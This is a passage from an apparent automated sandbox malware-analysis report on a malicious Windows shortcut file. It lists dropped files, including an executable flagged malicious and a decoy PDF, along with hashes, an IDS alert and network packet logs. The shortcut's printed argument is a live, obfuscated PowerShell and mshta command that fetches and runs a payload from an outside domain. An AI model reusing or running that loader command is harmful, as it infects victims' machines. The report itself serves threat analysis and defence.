                                                                        Entropy (8bit):7.97605879016224
                                                                        Encrypted:false
                                                                        SSDEEP:24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07/WLaGZDwYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs0jWLaGZo
                                                                        MD5:A0CFC77914D9BFBDD8BC1B1154A7B364
                                                                        SHA1:54962BFDF3797C95DC2A4C8B29E873743811AD30
                                                                        SHA-256:81E45F94FE27B1D7D61DBC0DAFC005A1816D238D594B443BF4F0EE3241FB9685
                                                                        SHA-512:74A8F6D96E004B8AFB4B635C0150355CEF5D7127972EA90683900B60560AA9C7F8DE780D1D5A4A944AF92B63C69F80DCDE09249AB99696932F1955F9EED443BE
                                                                        Malicious:false
                                                                        Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.

                                                                        C:\Users\user\AppData\Local\Temp\acrocef_low\64510b36-ffa3-4f82-af5f-8f3b34e0086b.tmp

                                                                        Download File
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                                        Category:dropped
                                                                        Size (bytes):386528
                                                                        Entropy (8bit):7.9736851559892425
                                                                        Encrypted:false
                                                                        SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                                        MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                                        SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                                        SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                                        SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                                        Malicious:false
                                                                        Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y

                                                                        C:\Users\user\AppData\Local\Temp\acrocef_low\fe70c079-4c3d-4989-becb-4f92db68029c.tmp

                                                                        Download File
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                                                        Category:dropped
                                                                        Size (bytes):1419751
                                                                        Entropy (8bit):7.976496077007677
                                                                        Encrypted:false
                                                                        SSDEEP:24576:/rwYIGNP4mOWL07oBGZ1dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:TwZG6bWLxBGZN3mlind9i4ufFXpAXkru
                                                                        MD5:95F182500FC92778102336D2D5AADCC8
                                                                        SHA1:BEC510B6B3D595833AF46B04C5843B95D2A0A6C9
                                                                        SHA-256:9F9C041D7EE1DA404E53022D475B9E6D5924A17C08D5FDEC58C0A1DCDCC4D4C9
                                                                        SHA-512:D7C022459486D124CC6CDACEAD8D46E16EDC472F4780A27C29D98B35AD01A9BA95F62155433264CC12C32BFF384C7ECAFCE0AC45853326CBC622AE65EE0D90BA
                                                                        Malicious:false
                                                                        Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.

                                                                        C:\Users\user\AppData\Local\Temp\dfac2112

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Roaming\bdd.exe
                                                                        File Type:PNG image data, 3344 x 1245, 8-bit/color RGB, non-interlaced
                                                                        Category:dropped
                                                                        Size (bytes):2758471
                                                                        Entropy (8bit):7.997330572040644
                                                                        Encrypted:true
                                                                        SSDEEP:49152:Q5ChWaN74trH53DSbUHztrNQsiouV7AtNaQF7iFFqadQ2qoEw8gD:JN74tD5zfztrOpnV0tA6a5dQ2qoEwH
                                                                        MD5:91E46D3B9ED0CE8454ACB6BD900CC61F
                                                                        SHA1:16C430FCCAFD3A9196C6B49FF6BAAEB0BF0AD2D7
                                                                        SHA-256:1D7DE4EBB98DDD680A6B6AFD11DAF75C3D97F6499556D0467A55080E2E07B575
                                                                        SHA-512:96FD07B96B517F8759E50B1F2F440A8E8AD5E243EA5E413C2EE64F9F2D1F2ED7C49C68632FD04863C58326E61089EBAB4C897CFB9A69CF0140D0F42D66AB23D6
                                                                        Malicious:false
                                                                        Preview:.PNG........IHDR..............<.H.. .IDATx..;.$....+.U.{..F.]./.l.#..c.k..M..K.r.!m.G6.+W...p..............W\....#"......;>.....Q=./........+A........:.m........h.a.._7.....R.[.s..i..u......G..!..B...G8.3.h...0..G...G..........,......*r).......x)rw)%.,K.....\JkM....g..<.....])..R.e.m.Bp..K1.....]..+....u..8.|].d.....A..X...........=.^ `..d....;.nH..|k..3..}......'Ts.....D....C..h.{......$.}w.np..h.n1..U9\F..<[...J..\..............c..f.6.g.o......$.1..^z)..8..c$./.|3...s.9..&.|...r....L.q..I~{)..>.uw..oY.d../..ksw..P..p.]....T.K1.R..i.........I.9B...............p...............$h...N...@S...>..A...B..q..w..".a..8[7.A...q..l.|,....X..Zh:..W.X..e.....G..W..e...|...b....B....N.... 0..k.-.z...p..._.......O.....U..%....7.g..M.q...\.K.}..$.Z....7.......=H.T.1>..K%qM&.|p.|....d|.. .R2...K.....b.0.u.. !......8.~-vA.|....{..&^.......}H...0N..`.....N.'M.t{\=$..............o.....@Q..A.$..K5.!...$g..a.-F...K-$;K....ij....`....~...,5|

                                                                        C:\Users\user\AppData\Roaming\Mcyga.pdf

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:PDF document, version 1.3, 4 pages
                                                                        Category:dropped
                                                                        Size (bytes):5165
                                                                        Entropy (8bit):7.497507313253075
                                                                        Encrypted:false
                                                                        SSDEEP:96:6IMOdRSgmj0iR8f9pviWtdylFVAsGjwAYgqK+n+SSuX3+G440B22BJoqY9:6IH3SgmVc/Fi/2jTYgqKu+SSuX3PbOF4
                                                                        MD5:288EB3FB4B84593F8DD6097F0CE7DB5B
                                                                        SHA1:7828035947333E2D86F489E5E93FBA5ED5143202
                                                                        SHA-256:9363A089E8823728F2555F2B977CC9F64BAF4F9CFC37C6B2CAE3B047090BA69F
                                                                        SHA-512:5879B0E1A2B3C101055393ECAEC633111E1D364B02C60BA891602C693B2FA125E1F0F86FA584474370391ABC2B0A3130E47F9842B244CD7CD36C9822B00AC301
                                                                        Malicious:false
                                                                        Preview:%PDF-1.3.3 0 obj.<</Type /Page./Parent 1 0 R./Resources 2 0 R./Contents 4 0 R>>.endobj.4 0 obj.<</Filter /FlateDecode /Length 743>>.stream.x..T]O.0.|.W.x...8.M.O.......N..$..).#.)..o..i..u.3.3.v..C..>Nn2...@].8...f....1.q@.....Z.....E.k#X%..$..%..R*H..WFhQ.ceU.7....>.......=d.(.H..$v.dw..$...Y6....0.<>&7.Y..&.-.K...?......t..=.....='.x{|7.M..(y.e. ........3..p........%+80.....`...-.....h...<o.[.,yn..-B ..... .....I..4._...>..u.).^....U.Z......l...G:w@.h...o.>.qD....Z.\....+....a.n....Ot.O...^..Y../.M..4.....8....&..........9..@...g.O=..}2..>.z..._.J6 j#...G....(.....a.....V....?'..|.v...j..B4.G.x.....5...2..QQ.d.By.N...6^.r.,;.7.I.d..Np.t...E......G...+..."N.L.g..<.....iz...7.C..Dr..u).3k. hK.K;.z.V5R.n...O......v.:...~~p.,...=..[.>D..7M.......$G.P: N......x........_..C..{..^`.K..E.^...d(..y.5.iP....6d[..p....Q.c.c....H.lV..........b.endstream.endobj.5 0 obj.<</Type /Page./Parent 1 0 R./Resources 2 0 R./Contents 6 0 R>>.endobj.6 0 obj.<</Filter /Fla

                                                                        C:\Users\user\AppData\Roaming\bdd.exe

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):14104424
                                                                        Entropy (8bit):6.61533286573729
                                                                        Encrypted:false
                                                                        SSDEEP:196608:8O6PMToeoQULQ7Y7ztrOpnVt6aI2ByvB0:EWoeofsKtrmVt3w0
                                                                        MD5:1B4971205E6226DF6B9B11527F70A14F
                                                                        SHA1:0D14FC7CF91AD3FF8B2D803204C1F43DEDC0B577
                                                                        SHA-256:E47292AE4FF353245DBE74CE199F6B9B2CAE20AD08089BC92A554883175D10F3
                                                                        SHA-512:FA6325812AC9C5D7D3ECACE3A5E4010AB5E2EB2A14BCAF1AA41FC5461443FE9D1F0534D3DFB869D089396DE1AB0E8AF2BC5F344368F97DEC0167DC7E91265C94
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win64..$7........................................................................................................................................PE..d...r..g..........#.........@H..............@..............................P.......-...............@............... ....................... ..Hh......y6.............h/......................................(....................9..x............................text...<......................... ..`.data....A.......B.................@....bss.........0...........................idata..Hh... ...j..................@....didata..............t..............@....tls.....................................rdata..(...........................@..@.pdata..............................@..@.rsrc....y6.....z6.................@..@...................................@..@................................................................................

                                                                        C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                        Download File
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):55
                                                                        Entropy (8bit):4.306461250274409
                                                                        Encrypted:false
                                                                        SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                        MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                        SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                        SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                        SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                        Malicious:false
                                                                        Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                        Static File Info

                                                                        General

                                                                        File type:MS Windows shortcut, Item id list present, Has Description string, Has Relative path, Has command line arguments, Icon number=11, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hidenormalshowminimized
                                                                        Entropy (8bit):2.7283495008168095
                                                                        TrID:
                                                                        • Windows Shortcut (20020/1) 100.00%
                                                                        File name:tz1WicW6sG.lnk
                                                                        File size:2'500 bytes
                                                                        MD5:762d0bf4de8d11d709c56029eb902274
                                                                        SHA1:b4afb65882ab115067b40386324502f113b21333
                                                                        SHA256:30fa4cb1ff177851f537fcb7e1a99dae38620761a7306677162a2664c3c86ea4
                                                                        SHA512:2362d7dd0bafbcf98064c7eda690a21965f5f515d6195ac59b6dd5278214cccb0636a99ec11ca40efd3c08c3b214ad985b1d1157fa9ba350be4780100fcc8811
                                                                        SSDEEP:24:8lj/BF//Z/Udt1v+/+GcoWbUk4vlXZvyvlG7M7dd79dsHhWUIeFIU:81LZwGJaUk4rvykI7dJ9Z5W
                                                                        TLSH:095187002EEA0725F3B36E7588BAA721843F7C45EEB29B1E004D0188172BA15E571F6B
                                                                        File Content Preview:L..................F.@...........................................................P.O. .:i.....+00.../C:\...................V.1...........Windows.@.............................................W.i.n.d.o.w.s.....Z.1...........System32..B.....................

                                                                        File Icon

                                                                        Icon Hash:72d282828e8d8dd5

                                                                        Static Windows Shortcut Info

                                                                        General

                                                                        Relative Path:..\..\..\..\..\..\..\Windows\System32\OpenSSH\ssh.exe
                                                                        Command Line Argument: -o ProxyCommand="powershell powershell -Command 'kqOxxi}}=eH>Yz1>9jmshta https://static.klipxuhaq.shop/BUX6P.mp4kqOxxi}}=eH>Yz1>9j'.SubString(18, 45)" .
                                                                        Icon location:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

                                                                        Network Behavior

                                                                        Suricata IDS Alerts

                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                        2024-12-17T08:38:28.064886+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.1249716188.114.96.6443TCP

                                                                        Network Port Distribution

                                                                        TCP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Dec 17, 2024 08:38:19.155076027 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:19.155122995 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:19.155205011 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:19.166702032 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:19.166722059 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:20.381700039 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:20.381778002 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:20.455857038 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:20.455878019 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:20.456290007 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:20.459690094 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:20.498871088 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:20.539345026 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:21.331757069 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:21.331829071 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:21.438002110 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:21.438071012 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:21.438081026 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:21.438124895 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:21.438155890 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:21.438163042 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:21.438189983 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:21.438229084 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:21.438232899 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:21.438344002 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:21.445029974 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:21.445086002 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:21.453329086 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:21.453408003 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:21.453423023 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:21.453560114 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:21.461757898 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:21.461867094 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:21.461889982 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:21.462050915 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:21.565953970 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:21.566092014 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:21.566111088 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:21.566153049 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:21.630244970 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:21.630343914 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:21.630363941 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:21.630409956 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:21.633922100 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:21.634056091 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:21.634082079 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:21.634279966 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:21.641421080 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:21.641496897 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:21.641520977 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:21.641587973 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:21.649187088 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:21.649269104 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:21.649286032 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:21.649343014 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:21.656646967 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:21.656749010 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:21.664185047 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:21.664347887 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:21.664367914 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:21.664447069 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:21.671740055 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:21.671802998 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:21.671814919 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:21.671991110 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:21.679965019 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:21.680313110 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:21.680329084 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:21.680641890 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:21.687021017 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:21.687432051 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:21.694645882 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:21.694772005 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:21.694785118 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:21.694852114 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:21.702090025 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:21.702145100 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:21.702155113 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:21.702195883 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:21.709656954 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:21.709767103 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:21.709950924 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:21.710045099 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:21.717305899 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:21.717355013 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:21.758069992 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:21.758234024 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:21.761821032 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:21.761987925 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:21.762000084 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:21.762095928 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:21.769381046 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:21.769474030 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:21.821973085 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:21.822211981 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:21.827467918 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:21.827543974 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:21.835663080 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:21.835741997 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:21.839821100 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:21.839884043 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:21.848005056 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:21.848072052 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:21.852077007 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:21.852157116 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:21.859877110 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:21.860275984 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:21.867806911 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:21.868040085 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:21.871819019 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:21.871964931 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:21.879842043 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:21.879929066 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:21.887624025 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:21.887756109 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:21.891371012 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:21.891529083 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:21.898169994 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:21.898426056 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:21.951411009 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:21.951484919 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:21.956512928 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:21.956592083 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:21.959922075 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:21.959990978 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:22.015753984 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:22.015858889 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:22.018059015 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:22.018131971 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:22.022665024 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:22.022746086 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:22.024808884 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:22.024877071 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:22.029058933 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:22.029154062 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:22.033201933 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:22.033341885 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:22.037358999 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:22.037461042 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:22.039874077 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:22.039936066 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:22.043768883 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:22.043915987 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:22.048527002 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:22.048588037 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:22.048618078 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:22.050137997 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:22.050235033 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:22.054284096 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:22.054558039 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:22.058729887 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:22.058820009 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:22.060631037 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:22.060858965 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:22.064752102 CET44349711104.21.48.1192.168.2.12
